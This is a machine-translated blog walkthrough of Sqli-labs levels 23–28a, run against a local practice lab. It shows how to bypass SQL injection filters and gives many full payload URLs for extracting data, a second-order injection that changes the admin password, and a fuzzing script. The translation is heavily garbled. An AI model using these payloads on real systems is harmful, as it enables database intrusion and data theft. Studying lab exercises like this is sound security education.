Learning SQL injection through Sqli-labs--the less23-28a of advanced challenges

This article link: http://blog.csdn.net/u012763794/article/details/51457142

This time I came again, advanced injections (the Advanced challenge), is some filter bypass things, the basic challenge to see this two

Recently the reverse hack went, http://www.giantbranch.cn/myblog/?p=27, so this dragged too long, completed today

Learning SQL injection through Sqli-labs-the less1-10 of fundamental challenges

http://blog.csdn.net/u012763794/article/details/51207833

Learning SQL injection through Sqli-labs-the less11-22 of fundamental challenges

http://blog.csdn.net/u012763794/article/details/51361152

First of all how to determine what the filter, we have to look at the problem, we can proceed to the next round of operation

Less get-error Based-strip Comments (Error-based, filtered comment GET type) First single quote, error

Add a%23 (#的url编码), for #,get to URL encoding, post submission is not necessary, this can look at the previous two articles

Then we can know that background PHP replaces # with empty because there are no gaps between the two single quotes

This doesn't work, so--one-line comment, because we're going to add a space or some other character to it, and the single-line comment works.

We can see the error here only the original statement limit in front of the single quotation mark, because we add a space, so that it and we add a single quotation mark separated by a space, we add the single quotation mark with the previous match no error, only quoted a single quote, contrast Less1 We know the filter-, Replaced with empty

Here's a comparison of no spaces

is Less1 , only to the back of the single quote error, because the single quotation mark and the front of the id= ' 1 ' was--separate, the front single quotation marks are matched, will not show the error

For LESS23, the judgment here is more obvious, there is no gap between the two single quotes, so it must be replaced by a null character.

Let's look at the source code, that's true.

Then summarize how to judge the comment filter, the specific filter into what will be the wrong message

#: Add a single quote, double quotes, etc.

--: This is also, directly add single quotation marks, double quotation marks, and then add a--, no space behind (because--when the comment is valid, there will be a space or other characters before the line, here to determine the filter is not necessary)

Then you can only close the bypass, multi-line comment is not like

Extracting data or something like two of less 1.

Less-24-second degree injections *real treat*-store injections (two injections) landing a look, is a complete registration login, password change site, a look at the root directory, there are indeed many files
By registering login above to understand the process, we will audit each file, we can start from index.php, actually have to interact with the database on the login_create.php,login.php,pass_change.php these three files

login.php (Files processed for login), filtering the user and password

login_create.php (files that are processed for new users)

$username =  mysql_escape_string ($_post[' username '); $pass = mysql_escape_string ($_post[' password '); $re _pass= Mysql_escape_string ($_post[' Re_password ');

Three fields were filtered,

By the pass_change.php, we'll have a harvest.

When the change password is found, it gets directly from the session without any filtering, and once my username has an annotation, I can change someone else's password.

Then we'll just create a new special user and change the password.

The following is an example of admin (account: admin '--Password: ASDF)

After registering to see if the database has

So the user name is not a comment, we log in to change the password, in order to facilitate the viewing effect, I add the output SQL statement in PHP

Look at the database, it's really changed.

may have the reunion asks, when registering the time not to be filtered the single quotation mark?

Yes, we admin '--turned into admin\ '--,

This makes the admin\ '--the left and right single quotes match correctly, but when it is stored in the database he is a single quotation mark Ah, (escaping just temporarily here makes it lose the effect of single quotes, but it still represents single quotes)

Of course, new users here

Admin ' # is also possible

Less Trick with or & and (filtered or and and)

Confirm single quote character injection http://localhost/sqli-labs/Less-25/?id=1 ' judgment filtered or, with Less1 comparison error can be inferred http://localhost/sqli-labs/Less-25/?id=1 ' Or1

Or cut a picture, the first one is Less1, the second figure is LESS25

Similarly

Judging filtered andhttp://localhost/sqli-labs/less-25/?id=1 ' and1

Re-analysis under the source code, opened the I-mode match, case is not spare, we can use or and and the corresponding mathematical symbols to inject

Use && to UrlEncode to the backstage

And, of course, double-write bypass.

Http://localhost/sqli-labs/Less-25/?id=1 ' Oorr ' 1 ' = ' 1http://localhost/sqli-labs/less-25/?id=1 ' anandd ' 1 ' = ' 1

Less 25a Trick with or & and Blind (Blind filter of OR and and) so how does the blind Judge filter and and or, and add or OR and directly before

The code of this problem is the same as above, but here is the error is closed, so here only to judge

Less than Trick with comments and space (injected with comments and spaces filtered)

Confirm Filter #http://localhost/sqli-labs/less-26/?id=%231 Confirm Filter orhttp://localhost/sqli-labs/less-26/?id= Or1 Confirm Filter Multiline Comment http://localhost/sqli-labs/less-26/?id=/*1 confirm filter A single line comment http://localhost/sqli-labs/Less-26/confirm filter Slash HTTP ://LOCALHOST/SQLI-LABS/LESS-26/?ID=/1 confirm Filter the backslash Http://localhost/sqli-labs/Less-26/?id=1 confirm filter the space, error injection just OK Oh, this judge http ://localhost/sqli-labs/less-26/?id=1 "

Really tired Ah, the following look at the source code, I am looking at the source confirmation, so confirm filter what is still relatively tired


The following look around, look at the difficult to go around, this time to extract the complete data bar, we often bypass the space is a multi-line comment,/**/but here filter, so this does not work, the following try wide-byte trick to see can replace the space, can see found can oh, then there is no other, Write a script to run and know (but a little pity ..., but still a little bit)


The script is as follows:

#-*-Coding:utf8-*-"" "  @version: @author: Giantbranch@file:testsqli.py@time:2016/5/29 23:14" "" Import Requestsdef Changetohex (num): TMP = Hex (i). replace ("0x", "") If Len (tmp) <2:tmp = ' 0 ' + tmpreturn "%" + Tmpreq = requests. Session () for I in Xrange (0,256): i = Changetohex (i) url = "Http://localhost/sqli-labs/Less-26/?id=1" + i + "%26%26" + i + "' 1 ' = ' 1" ret = req.get (URL) If ' Dumb ' in Ret.content:print "Good,this can use:" + I

Run results

I picked the first 09 to see, found in addition to%a0 other can not replace the space, a little sad ah, in fact, we found that in addition to%A0, basically are filtered characters, such as%20 (space),%23 (pound),%2a (asterisk)%2d (minus)%2f (slash)%5c (backslash), as for%09- %0d are what tabs, line breaks, page breaks and so on, is also a space bar, which can also find out what the program filter the original, pass not universal still need to test practice, retrofit estimate can find out what the program filtered
Then we can use%a0 instead of spaces.

Full payload:

Confirm Number of fields http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271http:// localhost/sqli-labs/less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271 gets the database currently in use http://localhost/ Sqli-labs/less-26/?id=0%27union%a0select%a01,database (), 3%a0%26%26%a0%271%27=%271 get table information http://localhost/ SQLI-LABS/LESS-26/?ID=0%27UNION%A0SELECT%A01,GROUP_CONCAT (table_name), 3%a0from%a0infoorrmation_schema.tables% A0where%a0table_schema= ' security '%26%26%a0%271%27=%271 get column information http://localhost/sqli-labs/Less-26/?id=0%27union% A0select%a01,group_concat (column_name), 3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema= ' Security '%a0anandd%a0table_name= ' emails '%26%26%a0%271%27=%271 finally obtained the data, found not to extract http://localhost/sqli-labs/Less-26/? id=0%27%a0union%a0select%a01,email_id,3%a0from%a0emails%26%26%a0%271%27=%271

Why the table columns are extracted, the data can not be extracted, error report I collapsed, this temporarily put, first next lesson, know can tell me
Update No. 6.1: Finally know how to extract data, the above syntax is really wrong, give two

Http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% A0union%a0select (1), 2, ' 3

Http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% a0where%a0%271%27=%271

Less 26a get-blind based-all your SPACES and COMMENTS belong to us (blinds with whitespace and annotations filtered)
This is similar to the above, but there will not be an error, then the decision to filter what is basically like above, here according to the return of the page has data or no data
But there is another question, how to distinguish whether he is filtered or forced into plastic, a picture let you know


As you can see, because the first character is not a digital intval directly converted to 0, and when filtered, then the id= #1就是正常的id =1 ID.

Less get-error based-all your union & Select belong to us (filter for union and select)
The old adage, judging as a single citation sizes

Http://localhost/sqli-labs/Less-27/?id=1 '

Find also filter spaces

The specific judgment with 26 almost, union and select to see the following judgment filter, change can judge double write, the size of the line is not

Http://localhost/sqli-labs/Less-27/?id=select1http://localhost/sqli-labs/Less-27/?id=union1

Take a look at the filter bar, multi-line comments, single-line comments, space-case unions and select


Directly on the payload

Http://localhost/sqli-labs/Less-27/?id= '%a0union%a0select (1), (Database ()), (3) or (1) = ' 1  exploded database http://localhost /sqli-labs/less-27/?id= '%a0union%a0select (1), (GROUP_CONCAT (table_name)), (3)%a0from%a0information_schema.tables %a0where%a0table_schema= ' security '%26%26%a0%271%27=%271  http://localhost/sqli-labs/Less-27/?id= '%a0union %a0select (1), Group_concat (column_name), 3%a0from%a0information_schema.columns%a0where%a0table_schema= ' security ' %a0%26%26%a0table_name= ' emails '%26%26%a0%271%27=%271 burst http://localhost/sqli-labs/Less-27/?id= '%a0union% A0select (1), Group_concat (email_id), 3%a0from%a0emails%a0union%a0select (1), 2, ' 3  extract data

Less 27a Get-blind Based-all your UNION & SELECT belong to us
This is the blind version of less 27, the double-cited sizes

Http://localhost/sqli-labs/Less-27a/?id=1 "or" 1 "=" 1

Let's give the payload of the blinds,

Judge the length of the database name, in fact, just deformed a bit, the principle is no different from the previous blinds,



Less Get-error Based-all your UNION & SELECT belong to us String-single quote with parenthesis based on incorrect, enclosed single-quote character type, over Filter the injection of union and select, etc.
Just look at the code, because it's similar to the course above.

That I is the pattern that is being matched, I is ignoring the case, \s is matching any whitespace character, tab, newline, space ah etc, then we can bypass the middle without space
Let's just use%a0.
Finally, the payload of extracting data

http://localhost/sqli-labs/Less-28/?id=0%27)%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% A0WHERE%A0 (%271%27=%271

Less 28a get-bind based-all your UNION & SELECT belong to us String-single quote with parenthesis based on blind, parenthesized single quote character type, over Filter the injection of union and select, etc.
The author has commented out the front, so let's get rid of the notes, or we won't be challenged.
This is the last blind, with the basics, not to mention too much.
Since this is the last lesson, give a concrete payload bar, explosion database, first look at the name length, and then look at each character, there is a length to know how many times it

Length is 8http://localhost/sqli-labs/less-28a/?id=1 ') and (length (Database ()) >7) and (' 1 ') = (' 1http://localhost/ Sqli-labs/less-28a/?id=1 ') and (length (Database ()) >8) and (' 1 ') = (' 1 The first character is 115, i.e. shttp://localhost/sqli-labs/ Less-28a/?id=1 ') and (ASCII (SUBSTR ((Select%a0database ())) >114) and (' 1 ') = (' 1http://localhost/sqli-labs/ Less-28a/?id=1 ') and (ASCII (SUBSTR ((Select%a0database ())) >115) and (' 1 ') = (' 1

OK, next time continue to challenge 29-38 lessons, refueling!!! And look forward to encouraging me to speed up the progress below

This article link: http://blog.csdn.net/u012763794/article/details/51457142

Learning SQL injection through Sqli-labs--the less23-28a of advanced challenges